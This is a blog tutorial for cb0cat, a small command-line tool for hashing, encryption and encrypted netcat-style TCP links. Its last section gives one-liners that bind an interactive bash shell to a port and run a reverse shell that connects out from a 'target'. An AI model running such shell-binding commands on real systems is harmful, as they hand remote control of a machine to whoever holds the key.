I’m happy to present a guest post by my friend Markku-Juhani O. Saarinen about cb0cat, a new tool he’s releasing, and a project sponsored by Kudelski Security. cb0cat will be useful to pentesters, cryptographers, and any user that needs an easy-to-use command-line tool to perform basic encrypted communications.
This post is a tutorial on the use of cb0cat, and is reproduced on the cb0cat website.
1. Introduction and License
This is a quick tutorial to the cb0cat multi-use cryptographic tool, which can be used to hash, encrypt, and decrypt files and to establish secure communication links over TCP. cb0cat has been designed to be self-contained, portable, and extremely lightweight (currently only about 1500 lines).
cb0cat is based on the CBEAM cryptographic permutation and BLINKER sponge mode of operation presented at Cryptography Track, RSA Conference USA 2014 (CT-RSA 2014). The two papers are:
M.-J. O. Saarinen: CBEAM: Efficient Authenticated Encryption from Feebly One-Way Phi Functions
M.-J. O. Saarinen: Beyond Modes: Building a Secure Record Protocol from a Cryptographic Sponge Permutation
The protocol can run on arbitrary network interfaces in addition to TCP. We have implemented it even on MSP430 ultra-low power embedded microcontroller chips.
Special thanks to Kudelski Security for sponsoring cb0cat. This software and documentation is released under a BSD-style license. There is absolutely no warranty or support provided.
Copyright © 2013, Markku-Juhani O. Saarinen <[email protected]> All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither Markku-Juhani O. Saarinen’s name nor Kudelski Security, CBEAM, BLINKER, or the names of any other affiliated Companies, Institutions, Designs or Products may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS “AS IS” AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL MARKKU-JUHANI O. SAARINEN BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
While Kudelski Security is acting as a sponsor of this initiative, M. Markku-Juhani O. Saarinen is the sole and exclusive owner of the copyright in this software at the exclusion of Kudelski Security. Kudelski Security has no responsibility whatsoever in such initiative and/or software and IN NO EVENT SHALL KUDELSKI SECURITY BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION).
2. Download, Compile, and Test
Versions of cb0cat are available from the distribution directory https://www.cblnk.com/cb0cat/dist. versions are numbered by dates: cb0cat-yyyymmddhhmmss.tgz.
This version is based on “revision zero” of CBEAM, called CBEAMr0. Note that after 15 March 2014 versions will be based on official first round CAESAR version CBEAMr1, and the name of this project will change correspondingly.
On any modern Linux platform you should be able to extract and compile the system with:
$ tar xfvz cb0cat-yyyymmddhhmmss.tgz
$ cd cb0cat
$ make
This will create the “cb0cat” executable which can be copied to a suitable location. If you’re compiling on a new platform you may quickly test the integrity of the CBEAM transform with:
$ ./cb0cat -t
Compiled on Dec 13 2013 01:52:56
cbeam_selftest() == 0
Zero implies success. There’s also some online help available:
$ ./cb0cat -h
CBEAMr0 Cryptographic Tool.
(c) 2013 Markku-Juhani O. Saarinen see LICENSE.
cb0cat [OPTION].. [FILE]..
-h This help text
-t Quick self-test and version information
Shared secret key (use twice to verify):
-q Prompt for key
-f Use file as a key
-k Specify key on command line
Files:
-s Hash stdin or files (default, optionally keyed)
-e Encrypt stdin or files (add .cb0 suffix)
-d Decrypt stdin or files (must have .cb0 suffix)
Communication via Blinker protocol:
-p Specify TCP port (standard 3248)
-c Connect to a specific host (client)
-l Listen to incoming connection (server)
3. Hashing
3. Hashing
When invoked with the “-s” flag, cb0cat behaves in a similar fashion to “md5sum” and “sha1sum” tools. If there are no additional parameters, data is simply taken in from stdin and hashed to the output.
$ echo "Hello" | ./cb0cat -s
9b25ceeedf9f787fb3a6b12a6b3b1e07fb8e382d69a5c777 -
You may also invoke it directly on files:
$ ./cb0cat -s *.h
60183ed73f8707f2230dbdc25ab4b32997ef4ce2a0bd6845 cbeam.h
c33fa04a0cac11610e014ed5913acc9e6841b77be9a6e000 cblnk.h
985d95e1773d53a8a2d841bf477b8991fd410b858766c2d9 comms.h
Hash outputs are always 192 bits for cb0cat.
4. Keying
All operations except hashing require a single symmetric shared key, which is used for both confidentiality and integrity protection. You can also specify a key for hashing; the same key will be required to verify the hash.
There are three ways to supply keys, and you can use any of them in any order, as many times you wish, but all of the supplied keys must be equal!
-q
Prompt for a password. Invoke twice with -qq and you will be asked to verify the given password. This is recommended for encryption operations.
-k key
Will take the key as argument on command line.
-f path
Reads the password from a file contained in argument. The entire contents of the file be used in binary form, so be careful about line feeds. You may also use special files such as pipes or /dev/tty.
Example. This keyed hashing operation uses all three key input methods:
$ echo "Hello" | ./cb0cat -q -k "" -f /dev/null -q -s
Secret key:
Verify key:
1674d303c1c8e49c37b58267f1a126d038a323ad36c7bcf8 -
You will be first prompted to enter a Secret Key. The operation will fail unless it’s just an enter due to empty password supplied by -k and -f. However you will be prompted again to verify the empty given password.
5. Encryption and Decryption
When invoked without file names, the operation is from standard input to standard output.
-e
Encrypt a stream or files.
-d
Decrypt a stream or files.
The “.cb0” suffix is added to encrypted files and expected from files to be decryption.
cb0cat is capable of encrypting and decrypting streams of arbitrary length as the operation is performed on individually protected chunks. Also there is strong integrity protection against truncation and other attacks, which leads to some message expansion. No other attributes except the contents of the file are protected; you should use tools such as “tar” to store those attributes.
To encrypt the binary executable itself:
$ ./cb0cat -e -k testkey cb0cat
$ ls -l cb0cat*
-rwxrwxr-x 1 mjos mjos 32160 Dec 13 02:42 cb0cat
-rw-rw-r-- 1 mjos mjos 32224 Dec 13 02:42 cb0cat.cb0
We will decrypt the ciphertext file to cb0cat.2 using streams:
$ ./cb0cat -d -k testkey cb0cat.2
We can now verify that the two plaintext files are equivalent by hashing them:
$ ./cb0cat -s cb0cat cb0cat.2
7462d6bc9531b0dce97edb583e7c17115c48ce30760bca54 cb0cat
7462d6bc9531b0dce97edb583e7c17115c48ce30760bca54 cb0cat.2
Your compilation of the binary will have a different hash.
6. Networking and File Transfer
The networking side of cb0cat has been modeled after the “netcat” tool, with the difference that cb0cat uses and a rather elaborate (yet fast) randomized mutual authentication scheme to establish session keys for confidentiality and integrity protection.
-p port
Specify a TCP port. By default port 3248 (hex 0xCB0) is used.
-l
Listen mode. Wait for an incoming connection at the specified port, perform handshake and authentication, and then direct standard input and output through the established cryptographic channel.
-c hostname
Connect to the Internet host given as argument (e.g. localhost) and perform handshake and authentication. Standard input and output are forwarded to the encrypted channel.
The same keying options are available as for file encryption and decryption.
In it’s most basic form we can have a little chat over the channel. On first terminal, set up listener with shared secret “password” on the standard port 3248.
bobby$ ./cb0cat -k password -l
On second terminal, we can connect to the listener at bobby, port 3248:
alice$ ./cb0cat -q -c bobby
Secret key:
You must enter the correct “password” in the prompt for the authentication to success. After this you may write lines of text to either terminal and it will pop up in the other (the standard streams are line buffered by default).
We may also transmit files using streams. This command issued on bobby will wait for connection at port 12345:
bobby$ ./cb0cat -k keykey -p 12345 -l > dump.dat
Upon execution the command
alice$ ./cb0cat -k keykey -p 12345 -c bobby < dump.dat
The file “dump.dat” will be copied to destination.
7. Binding a Shell or Command
A simple shell can be bound at either end of the connection simply by specifying the shell (or any other interactive command) as a singular argument. You must pass arguments to the command inside parenthesis so that they are not confused with arguments to cb0cat.
This starts a “poor man’s sshd” for a single incoming session at port 12345 with shared secret “keu”:
bobby$ ./cb0cat -p 12345 -k keu -l "/bin/bash -i"
To connect:
alice$ ./cb0cat -p 12345 -k keu -c bobby
Upon connection one may now use the shell at “bobby”. Since i/o is line buffered and there is no tty handshake, the interaction is somewhat limited.
Reverse bind shell as easy; we first start the listener without arguments:
bobby$ ./cb0cat -p 12345 -k keu -l
And then invoke on target:
alice$ ./cb0cat -p 12345 -k keu -c bobby "/bin/bash -i"
And target’s shell will pop up at bobby.
Kudelski Security Research 